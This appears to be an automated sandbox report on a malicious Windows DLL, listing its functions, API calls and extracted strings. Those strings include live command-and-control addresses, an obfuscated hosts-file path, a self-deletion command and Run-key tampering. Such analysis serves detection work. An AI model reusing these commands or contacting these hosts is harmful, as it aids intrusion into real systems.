                                      • 6D262DD0.MFC42(?), ref: 10001800
                                      • 6D262DD0.MFC42(00001000,?), ref: 100018F9
                                      • lstrcpy.KERNEL32(00000000,00000001), ref: 10001905
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262$lstrcpy
                                      • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$>$?$VUUU
                                      • API String ID: 1611889739-3561551665
                                      • Opcode ID: e46855ab96d208aa0919aa6072f022ac120e40eb92bef6f217f5988191405041
                                      • Instruction ID: 8cabffa663a16b6991171aaa738c89542f520e9d9bfc23d5e5b8b96ced797da2
                                      • Opcode Fuzzy Hash: e46855ab96d208aa0919aa6072f022ac120e40eb92bef6f217f5988191405041
                                      • Instruction Fuzzy Hash: 9C325AB09293A18BE375CF09C5987DFBAE8FB89B44F10891FE1D986241C7B54645CF82
                                      Function 1000BB70 Relevance: 57.9, APIs: 26, Strings: 7, Instructions: 186sleepthreadfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 10007280: wsprintfA.USER32 ref: 100072AE
                                        • Part of subcall function 10007280: GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 100072C5
                                        • Part of subcall function 10007280: GetModuleFileNameA.KERNEL32(10000000,C:\Users\user\Desktop\NaRZIOq3O8.dll,00000104), ref: 100072D7
                                        • Part of subcall function 10007280: strrchr.MSVCRT ref: 10007305
                                        • Part of subcall function 10007280: wsprintfA.USER32 ref: 10007322
                                        • Part of subcall function 10007280: wsprintfA.USER32 ref: 10007333
                                        • Part of subcall function 10007280: wsprintfA.USER32 ref: 10007344
                                        • Part of subcall function 10007280: 6D262DD0.MFC42(00000084), ref: 1000734B
                                      • CreateMutexA.KERNEL32(00000000,00000001,M107.163.241.193:6520,10019CD8), ref: 1000BB91
                                      • GetLastError.KERNEL32 ref: 1000BB97
                                      • PathIsDirectoryA.SHLWAPI(C:\Users\user\Desktop\11121541), ref: 1000BBCD
                                      • CreateDirectoryA.KERNEL32(C:\Users\user\Desktop\11121541,00000000), ref: 1000BC01
                                      • Sleep.KERNEL32(000007D0), ref: 1000BC17
                                      • DeleteFileA.KERNEL32(?), ref: 1000BC1A
                                      • CreateThread.KERNEL32(00000000,00000000,100099A0,00000000,00000000,00000000), ref: 1000BC3E
                                      • Sleep.KERNEL32(000003E8), ref: 1000BC45
                                      • WSAStartup.WS2_32(00000202,?), ref: 1000BC54
                                      • CreateThread.KERNEL32(00000000,00000000,10009520,107.163.241.193:6520,00000000,00000000), ref: 1000BC72
                                      • CreateThread.KERNEL32(00000000,00000000,1000B700,00000000,00000000,00000000), ref: 1000BC83
                                      • Sleep.KERNEL32(00000BB8), ref: 1000BC8A
                                      • CreateThread.KERNEL32(00000000,00000000,10009C70,00000000,00000000,00000000), ref: 1000BCCA
                                      • CreateThread.KERNEL32(00000000,00000000,1000B7C0,00000000,00000000,00000000), ref: 1000BCDB
                                      • Sleep.KERNEL32(00000BB8), ref: 1000BCE2
                                      • CreateThread.KERNEL32(00000000,00000000,10005E10,00000000,00000000,00000000), ref: 1000BCF3
                                      • CreateThread.KERNEL32(00000000,00000000,100099B0,00000000,00000000,00000000), ref: 1000BD04
                                      • Sleep.KERNEL32(000927C0), ref: 1000BD0B
                                      • Sleep.KERNEL32(000927C0), ref: 1000BD1B
                                      • CreateThread.KERNEL32(00000000,00000000,10009450,00000000,00000000,00000000), ref: 1000BD2C
                                      • Sleep.KERNEL32(0000EA60), ref: 1000BD33
                                        • Part of subcall function 10005870: LoadLibraryA.KERNEL32 ref: 1000588A
                                        • Part of subcall function 10005870: GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 1000589A
                                        • Part of subcall function 10005870: GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000), ref: 100058B1
                                      • CreateThread.KERNEL32(00000000,00000000,1000BA00,00000000,00000000,00000000), ref: 1000BD44
                                      • Sleep.KERNEL32(000000FF), ref: 1000BD48
                                        • Part of subcall function 100056F0: StrStrIA.SHLWAPI(?,cmd.exe,774D0F00,?,00000000), ref: 10005706
                                      • wsprintfA.USER32 ref: 1000BD75
                                      • Sleep.KERNEL32(000007D0), ref: 1000BD9B
                                      • DeleteFileA.KERNEL32(?), ref: 1000BDA2
                                        • Part of subcall function 10005620: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 1000562A
                                        • Part of subcall function 10005620: OpenProcessToken.ADVAPI32(00000000), ref: 10005631
                                        • Part of subcall function 10005620: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10005647
                                        • Part of subcall function 10005620: AdjustTokenPrivileges.KERNELBASE ref: 1000568A
                                        • Part of subcall function 10005620: CloseHandle.KERNEL32 ref: 10005695
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Create$SleepThread$wsprintf$File$DeleteDirectoryModuleNameProcessToken$AddressAdjustCloseCurrentD262ErrorExtendedHandleLastLibraryLoadLookupMutexOpenPathPrivilegePrivilegesProcStartupTableValuestrrchr
                                      • String ID: 107.163.241.193:6520$123$C:\Users\user\Desktop$C:\Users\user\Desktop\11121541$M107.163.241.193:6520$SeDebugPrivilege$cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s"
                                      • API String ID: 2415948166-2841148663
                                      • Opcode ID: 018e1f2a6cdc16a32f09860ae9f822d303fb44d8efb97839f19e393dd835906d
                                      • Instruction ID: 7ac460b640bc8df6dd4afea00a726a4ab02921dc9a65f5646ed82dd80945aab9
                                      • Opcode Fuzzy Hash: 018e1f2a6cdc16a32f09860ae9f822d303fb44d8efb97839f19e393dd835906d
                                      • Instruction Fuzzy Hash: 6D518E70B8475476F230EB608C4BF8A7A50DB44F91F204519F7497E1D5DBF0B1548AAB
                                      Function 10007E20 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 168stringnetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: strcspnstrstr$strncpy$Startupatoiclosesocketconnecthtonssocket
                                      • String ID: http://
                                      • API String ID: 2221484516-1121587658
                                      • Opcode ID: 44d22dc169835b13d51071f1eb418a582025dad4709cce38a998946081ae1d9a
                                      • Instruction ID: bc3784d7d81ef269009f725925b13efc19acb8278c31ba2a6c6e4a5a612b11a5
                                      • Opcode Fuzzy Hash: 44d22dc169835b13d51071f1eb418a582025dad4709cce38a998946081ae1d9a
                                      • Instruction Fuzzy Hash: 6351C3712043456BE320DB34CC85BEBB7D9FF88350F404A29FA9997281DB79D61886A2
                                      Function 10008030 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 427COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 139 10008030-100080c6 wsprintfA 6D262DD0 call 100050e0 141 100080cb-100080d0 139->141 142 100080d2-100080e4 141->142 143 100080e5-10008102 call 10005100 141->143 146 10008104-10008116 143->146 147 10008117-10008146 143->147 150 10008148-1000816a 147->150 151 1000816d 147->151 150->151 152 10008171-1000818a call 10005130 151->152 156 10008190-10008193 152->156 157 10008237-1000829c 152->157 156->157 158 10008199-10008232 MultiByteToWideChar 6D262DD0 MultiByteToWideChar WideCharToMultiByte 6D262DD0 WideCharToMultiByte call 10010f40 * 2 156->158 167 100082a0-100082af 157->167 168 1000829e 157->168 158->152 169 100082b1-100082b3 167->169 170 10008323-10008342 wsprintfA 167->170 168->167 172 100082d1-100082df 169->172 173 100082b5-100082ba 169->173 171 10008344-10008346 170->171 174 10008348-1000834e 171->174 175 1000836d-10008384 call 10010f40 strrchr 171->175 178 100082f1-10008304 172->178 179 100082e1-100082e6 172->179 176 100082c7-100082ce call 10010f40 173->176 177 100082bc-100082be 173->177 180 10008350-10008362 174->180 181 10008364-1000836b 174->181 191 10008402-10008407 175->191 192 10008386-1000838e 175->192 176->172 177->176 182 100082c0-100082c5 177->182 185 10008305-10008322 call 10010f40 179->185 186 100082e8-100082ea 179->186 180->171 181->171 182->172 186->185 189 100082ec-100082ee 186->189 189->178 194 10008425-10008433 191->194 195 10008409-1000840e 191->195 196 10008390-10008395 192->196 197 100083ac-100083ba 192->197 202 10008462-10008474 194->202 203 10008435-1000843a 194->203 198 10008410-10008412 195->198 199 1000841b-10008422 call 10010f40 195->199 200 100083a2-100083a9 call 10010f40 196->200 201 10008397-10008399 196->201 204 100083ec-10008401 197->204 205 100083bc-100083c1 197->205 198->199 208 10008414-10008419 198->208 199->194 200->197 201->200 209 1000839b-100083a0 201->209 212 10008458-1000845f call 10010f40 203->212 213 1000843c-1000843e 203->213 206 100083e2-100083e9 call 10010f40 205->206 207 100083c3-100083c5 205->207 206->204 207->206 215 100083c7-100083e1 207->215 208->194 209->197 212->202 213->212 214 10008440-10008457 213->214
                                      APIs
                                      • wsprintfA.USER32 ref: 10008093
                                      • 6D262DD0.MFC42(0007D000), ref: 1000809E
                                        • Part of subcall function 100050E0: InternetOpenA.WININET(?,?,?,?,?), ref: 100050F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262InternetOpenwsprintf
                                      • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$http://blog.sina.com.cn/u/%s$title
                                      • API String ID: 2627167135-1204782975
                                      • Opcode ID: dfd9a203dac871dcf9b230ba8f9e42176b09cbb43efbcb095429f1359e1ec5f6
                                      • Instruction ID: 0dc96db265ef937b0d0fa70f15691eb36084b8502b1a1f786cdd5324ccd44853
                                      • Opcode Fuzzy Hash: dfd9a203dac871dcf9b230ba8f9e42176b09cbb43efbcb095429f1359e1ec5f6
                                      • Instruction Fuzzy Hash: DCD15A76A002446FEB14CFA8CC85BFEBBA5FB44290F10426EF95997681DA729E01C791
                                      Function 10005460 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 145filestringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,774D0F00,?,?,10005746,00000000,self,?,00000000), ref: 100054BC
                                      • strrchr.MSVCRT ref: 100054C9
                                      • CreateFileA.KERNEL32(?,10000000,00000007,00000000,00000004,00000080,00000000,?,00000000), ref: 10005522
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000), ref: 10005538
                                      • time.MSVCRT(00000000,?,00000000), ref: 1000553F
                                      • _localtime32.MSVCRT(?,?,00000000), ref: 1000554E
                                      • strftime.MSVCRT ref: 10005561
                                      • vsprintf.MSVCRT ref: 100055B3
                                      • sprintf.MSVCRT ref: 100055D3
                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 100055FD
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10005604
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleModuleNamePointerWrite_localtime32sprintfstrftimestrrchrtimevsprintf
                                      • String ID: %s%s$log.txt
                                      • API String ID: 2392943451-1489102009
                                      • Opcode ID: 52cdcfc05b5e2a2109bc0a018a5dd34bdfef92a37fde07e32da0d56ab52059b9
                                      • Instruction ID: b92b12cda10bb2cd97a7de79ac6255796b6fed7ae908d87d16a6086495e58579
                                      • Opcode Fuzzy Hash: 52cdcfc05b5e2a2109bc0a018a5dd34bdfef92a37fde07e32da0d56ab52059b9
                                      • Instruction Fuzzy Hash: 4241D5B1148344AFE328CB74CC999EB77A9EBC8351F404A2DF75A872D0DBB59908C651
                                      Function 1000B7C0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 189sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 231 1000b7c0-1000b895 GetSystemDirectoryA * 2 call 10001000 * 2 6D262DD0 236 1000b897-1000b8e2 call 100075a0 231->236 239 1000b8e4-1000b8f9 236->239 240 1000b8fb-1000b90c 236->240 241 1000b90d-1000b939 call 100050c0 call 10007ca0 239->241 240->241 246 1000b93b-1000b948 Sleep 241->246 247 1000b94d-1000b951 241->247 246->236 248 1000b953-1000b95b 247->248 249 1000b977-1000b986 247->249 250 1000b962-1000b965 248->250 251 1000b95d-1000b961 248->251 252 1000b9d0-1000b9fb call 10009df0 Sleep 249->252 253 1000b988-1000b98a 249->253 255 1000b967-1000b96a 250->255 256 1000b96c 250->256 251->250 252->236 257 1000b98f-1000b995 253->257 259 1000b96f-1000b975 255->259 256->259 260 1000b9b3-1000b9b5 257->260 261 1000b997-1000b999 257->261 259->248 259->249 262 1000b9b8-1000b9ba 260->262 263 1000b99b-1000b9a3 261->263 264 1000b9af-1000b9b1 261->264 262->252 265 1000b9bc-1000b9cd wsprintfA 262->265 263->260 267 1000b9a5-1000b9ad 263->267 264->262 265->252 267->257 267->264
                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B80A
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B819
                                      • 6D262DD0.MFC42(00080000,XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==,XGRyaXZlcnNcZXRjXGhvc3Rz), ref: 1000B88D
                                      • Sleep.KERNEL32(000927C0), ref: 1000B942
                                      • wsprintfA.USER32 ref: 1000B9C7
                                      • Sleep.KERNEL32(000927C0), ref: 1000B9F5
                                      Strings
                                      • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 1000B81B
                                      • cmd.exe /c ipconfig /flushdns, xrefs: 1000B9E4
                                      • 127.0.0.1, xrefs: 1000B9D5
                                      • http://107.163.241.186:12354/login.php, xrefs: 1000B8FB
                                      • 8.8.8.8, xrefs: 1000B9D0
                                      • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 1000B836
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: DirectorySleepSystem$D262wsprintf
                                      • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$cmd.exe /c ipconfig /flushdns$http://107.163.241.186:12354/login.php
                                      • API String ID: 1478259680-42274971
                                      • Opcode ID: 8e9196231dcfb8476761a53707d50ac412fe7b967630b0d11d4226dfc570b8ce
                                      • Instruction ID: 5bded651d412340725d0a4c63ae39483ba610a665616dbfa0bfcbea02e9b2bc5
                                      • Opcode Fuzzy Hash: 8e9196231dcfb8476761a53707d50ac412fe7b967630b0d11d4226dfc570b8ce
                                      • Instruction Fuzzy Hash: 25516E71514A486BE364CA34CCA1BEB3BC6EB953A0F104A3DF786872D5ED71D948C292
                                      Function 10009450 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 61sleepsynchronizationthreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • 6D262DD0.MFC42(00001218), ref: 1000945F
                                      • WSAStartup.WS2_32(00000202,?), ref: 10009473
                                        • Part of subcall function 10005080: CreateMutexA.KERNEL32(?,?,?,10009555), ref: 1000508F
                                      • GetLastError.KERNEL32 ref: 1000948C
                                      • CloseHandle.KERNEL32(00000000), ref: 100094FE
                                        • Part of subcall function 10008030: wsprintfA.USER32 ref: 10008093
                                        • Part of subcall function 10008030: 6D262DD0.MFC42(0007D000), ref: 1000809E
                                      • Sleep.KERNEL32(0002BF20,00000000,00000000), ref: 100094C0
                                      • CreateThread.KERNEL32 ref: 100094DC
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 100094E7
                                      • CloseHandle.KERNEL32(00000000), ref: 100094EE
                                      • Sleep.KERNEL32(0002BF20), ref: 100094F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseCreateD262HandleSleep$ErrorLastMutexObjectSingleStartupThreadWaitwsprintf
                                      • String ID: 0x5d65r455f$5655029807
                                      • API String ID: 3959575285-1179119988
                                      • Opcode ID: 578a8b3bfa932a769acf868f9e4ec53adfd9d175f8e518d4df08ae5bf0750ec9
                                      • Instruction ID: 5e1dba5c7bc71828a1d61e85a2d88ef44d6a5280b45a2a65baa4fdc2c608d569
                                      • Opcode Fuzzy Hash: 578a8b3bfa932a769acf868f9e4ec53adfd9d175f8e518d4df08ae5bf0750ec9
                                      • Instruction Fuzzy Hash: C411F5B66402247BF750D7A49C8FFEB3648DB48795F004234FF08991C6DB75992582A7
                                      Function 10007750 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 151registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,100199D8), ref: 1000777F
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 10007839
                                      • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,100199D8), ref: 10007892
                                        • Part of subcall function 10005360: RegQueryValueExA.KERNEL32(?,?,?,?,?,00000000,100077BC), ref: 1000537E
                                        • Part of subcall function 10005350: RegCloseKey.KERNEL32(100199D8,100077C6,?), ref: 10005355
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValue
                                      • String ID: %u MB$11121541$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.241.186:12354/login.php
                                      • API String ID: 2543995030-3015006635
                                      • Opcode ID: fc7d72a152619b582a3fefedd51e004960f2eda1014b792e2f96d369dc7e128d
                                      • Instruction ID: c5dd48205e3bca1180acbc7f94ac086bba4f0d0af77615eae8fb4fb729731d8a
                                      • Opcode Fuzzy Hash: fc7d72a152619b582a3fefedd51e004960f2eda1014b792e2f96d369dc7e128d
                                      • Instruction Fuzzy Hash: 854117766042005BE718CA38CC45BAB77D5FBC8350F944A2CFA59CB2C5EE78EA09C791
                                      Function 1000BA00 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 108registrysleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 314 1000ba00-1000ba4c call 10010fa0 317 1000ba51-1000ba6f RegOpenKeyExA 314->317 318 1000ba75-1000baa5 RegQueryInfoKeyA 317->318 319 1000bb48-1000bb5e RegCloseKey Sleep 317->319 318->319 320 1000baab-1000bab3 318->320 319->317 320->319 321 1000bab9-1000bb12 RegEnumValueA 320->321 322 1000bb14-1000bb26 StrStrIA 321->322 323 1000bb3b-1000bb42 321->323 322->323 324 1000bb28-1000bb35 RegDeleteValueA 322->324 323->319 323->321 324->323
                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,00000000), ref: 1000BA67
                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000BA9D
                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 1000BB0C
                                      • StrStrIA.SHLWAPI(00000000,svchsot.exe), ref: 1000BB1E
                                      • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 1000BB35
                                      • RegCloseKey.ADVAPI32(00000000), ref: 1000BB4D
                                      • Sleep.KERNEL32(000493E0), ref: 1000BB58
                                      Strings
                                      • svchsot.exe, xrefs: 1000BB18
                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000BA5D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Value$CloseDeleteEnumInfoOpenQuerySleep
                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$svchsot.exe
                                      • API String ID: 2160694657-2172464104
                                      • Opcode ID: 4e27199c7ad9a2771cfa9659ddadbab6851e6264533792b6733e40e2567ba759
                                      • Instruction ID: 9cde71c0bbbc315761c064880cf2f3fcda6eb6ddb1b00218362d2001d0698cab
                                      • Opcode Fuzzy Hash: 4e27199c7ad9a2771cfa9659ddadbab6851e6264533792b6733e40e2567ba759
                                      • Instruction Fuzzy Hash: 9C311E71205341ABE315CF55CD84FABB7E9FBC8B44F404A2DF28596245D770EA05CBA2
                                      Function 1000C340 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 340 1000c340-1000c38a Netbios 341 1000c38c-1000c39e 340->341 342 1000c39f-1000c3a7 340->342 343 1000c3a9-1000c3c6 Netbios 342->343 344 1000c3ee-1000c44e Netbios 342->344 343->344 345 1000c3c8-1000c3d5 343->345 346 1000c450-1000c462 344->346 347 1000c463-1000c4d2 sprintf 344->347 345->343 348 1000c3d7-1000c3d9 345->348 348->344 349 1000c3db-1000c3ed 348->349
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Netbios
                                      • String ID: %02X%02X%02X%02X%02X%02X$2$3
                                      • API String ID: 544444789-1505804699
                                      • Opcode ID: af20756df40ebd6339beb114ddc91ef19d7f3563555a5a83e0a027d6d8b1a0ce
                                      • Instruction ID: ce6d5c193f772186174b1e4aad9d2ff49001eec6116d7ace393251796c525a04
                                      • Opcode Fuzzy Hash: af20756df40ebd6339beb114ddc91ef19d7f3563555a5a83e0a027d6d8b1a0ce
                                      • Instruction Fuzzy Hash: 1E41B0321187869BD725CA18C8407FBB7D5EFC4350F04487DB5D48B682EAB9E609C793
                                      Function 10009520 Relevance: 10.5, APIs: 7, Instructions: 46sleepsynchronizationthreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • WSAStartup.WS2_32(00000202), ref: 10009534
                                        • Part of subcall function 10005080: CreateMutexA.KERNEL32(?,?,?,10009555), ref: 1000508F
                                      • GetLastError.KERNEL32 ref: 1000955A
                                      • CreateThread.KERNEL32(00000000,00000000,100091C0,?,00000000,00000000), ref: 10009580
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10009587
